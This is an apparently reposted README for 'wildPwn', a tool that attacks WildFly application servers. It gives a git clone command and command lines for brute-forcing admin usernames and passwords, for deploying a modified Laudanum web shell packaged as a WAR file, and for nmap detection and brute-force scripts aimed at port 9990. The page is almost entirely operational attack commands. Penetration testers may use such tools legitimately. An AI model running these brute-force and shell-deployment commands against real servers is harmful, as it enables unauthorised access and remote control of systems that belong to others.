wildPwn: Brute forcer and shell deployer for WildFly
wildPwn – WildFly Exploitation Tool
It is a tool for WildFly. The tool can be used to brute force or shell deploy. wildPwn.war contains modified Laudanum Shell. userList.txt contains common usernames and passList.txt contains common passwords.
Download
git clone https://github.com/hlldz/wildPwn.git
Usage
Bruteforce
python wildPwn.py -m brute –target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST>
Shell Deploy
python wildPwn.py -m deploy –target <TARGET> –port <PORT> -u <USERNAME> -p <PASSWORD>
Nmap Scripts
Detection
nmap –script wildfly-detect <TARGET>
Brute Force
nmap -p 9990 –script wildfly-brute –script-args “userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com” <TARGET>
Demo
Copyright (C) 2016 hlldz
Source: https://github.com/hlldz/
